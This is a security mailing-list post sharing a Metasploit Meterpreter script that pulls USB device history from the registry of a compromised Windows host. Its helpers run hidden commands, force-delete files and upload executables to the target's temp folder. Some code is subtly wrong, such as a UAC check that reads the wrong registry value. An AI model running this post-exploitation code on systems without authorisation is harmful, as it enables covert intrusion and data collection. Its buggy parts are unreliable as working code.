Hi Carlos,
below is the code for my script.
Thanks,
Jim
#
# This is a Meterpreter script designed to be used by the Metasploit
Framework
#
# Meterpreter script for pulling forensics data from registry for any USB
device
# connected to system
#
# Provided by Dimitrios Kapsalis
# Verion: 0.1
require 'fileutils'
#Function for writing data to a file
def m_filewrt(file2wrt, data2wrt)
output = ::File.open(file2wrt, "a")
data2wrt.each_line do |d|
output.puts(d)
end
output.close
end
#
====================================================================================================================================
# Checking for UAC
#
====================================================================================================================================
def m_uaccheck(session)
uac = false
winversion = session.sys.config.sysinfo
if winversion['OS']=~ /Windows Vista/ or winversion['OS']=~ /Windows 7/
if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
begin
print_status("Checking if UAC is enabled .....")
key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE,
'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
if key.query_value('Identifier') == 1
print_status("UAC is Enabled")
uac = true
end
key.close
rescue::Exception => e
print_status("Error Checking UAC: #{e.class} #{e}")
end
end
end
return uac
end
#
====================================================================================================================================
# Print message to file on target
#
====================================================================================================================================
def m_writetofile(session,file,message)
cmd = "cmd /c echo #{message} >> #{file}"
m_exec(session, cmd)
end
#
====================================================================================================================================
# Delete a file (meterpreter has no unlink API yet)
#
====================================================================================================================================
def m_unlink(session, path)
r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil,
{'Hidden' => 'true'})
while(r.name)
select(nil, nil, nil, 0.10)
end
r.close
end
#
====================================================================================================================================
# Exec a command and return the results
#
====================================================================================================================================
def m_exec(session, cmd)
begin
r = session.sys.process.execute(cmd, nil, {'Hidden' => true,
'Channelized' => true})
b = ""
while(d = r.channel.read)
b << d
end
r.channel.close
r.close
b
rescue ::Exception => e
print_status("Error Running Command #{cmd}: #{e.class} #{e}")
end
end
#
====================================================================================================================================
# Function to upload files
#
====================================================================================================================================
def m_upload(session,file)
location = session.fs.file.expand_path("%temp%")
fileontrgt = "#{location}\\#{rand(100)}.exe"
print_status(" -- Uploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")
print_status(" -- #{file} uploaded!")
print_status(" -- File on target #{fileontrgt}")
return fileontrgt
end
#
====================================================================================================================================
# Function to download files
#
====================================================================================================================================
def m_download(session,src,dst)
location = session.fs.file.expand_path("%temp%")
print_status(" -- Downloading #{src}....")
session.fs.file.download_file("#{dst}","#{src}")
print_status(" -- #{dst} downloaded!")
end
#
====================================================================================================================================
# Script proper
#
====================================================================================================================================
# The 'client' object holds the Meterpreter session
# Aliasing here for plugin compatibility
session = client
script_name = "installedsoftware"
# Extract the host and port
host,port = session.tunnel_peer.split(':')
print_status("New session on #{host}:#{port}...")
# Create a directory for the logs
logs = ::File.join(Msf::Config.config_directory, 'logs',script_name , host +
"_" + Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000)) )
# Create the log directory
::FileUtils.mkdir_p(logs)
print_status("-- Files saved to #{logs}...")
location = session.fs.file.expand_path("%temp%")
filename = "#{rand(100)}.dat"
fileontrgt = "#{location}\\#{filename}"
print_status("-- Data logged to #{fileontrgt}....")
begin
#===============================================================================================================================
#===============================================================================================================================
#===============================================================================================================================
# Pull USB history Pull USB history Pull USB history Pull USB history
Pull USB history Pull USB history Pull USB history
#===============================================================================================================================
#===============================================================================================================================
#===============================================================================================================================
#===========================================================================================
# Dump USB device history
#===========================================================================================
key = "HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR"
root_key, base_key = session.sys.registry.splitkey(key)
log = "#{logs}\\installedusb.txt"
message = ""
message <<
"---------------------------------------------------------------------\n"
message << "Dumping software installed on pc per registry #{key}... \n"
message <<
"---------------------------------------------------------------------\n"
m_filewrt(log, message)
session.sys.registry.create_key(root_key, base_key).each_key() do
|device|
puts device
# =========================================
# ...
# =========================================
session.sys.registry.create_key(root_key,
"#{base_key}\\#{device}").each_key() do |intermediate|
puts intermediate
message = ""
rk = session.sys.registry.open_key(root_key,
"#{base_key}\\#{device}\\#{intermediate}", KEY_READ)
cl = rk.query_value("class")
deviceDesc = rk.query_value("DeviceDesc")
friendlyName = rk.query_value("FriendlyName")
hardwareID = rk.query_value("HardwareID")
rk.close
message << "
========================================================================================================================\n"
message << " Friendly Name : #{friendlyName.data}\n"
message << " - Class : #{cl.data}\n"
message << " - DeviceDesc : #{deviceDesc.data}\n"
message << " - HardwareID : #{hardwareID.data}\n"
hdid = hardwareID.data
ids = hdid.split("USBSTOR")
ids.each do |num|
message << " : USBSTOR#{num}\n"
end
print_status(message)
m_filewrt(log, message)
message = ""
end
end
print_status("...Done!!")
rescue ::Exception => e
print_status("Exception: #{e.class} #{e} #{e.backtrace}")
end
print_status("Completed processing on #{host}:#{port}...")
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
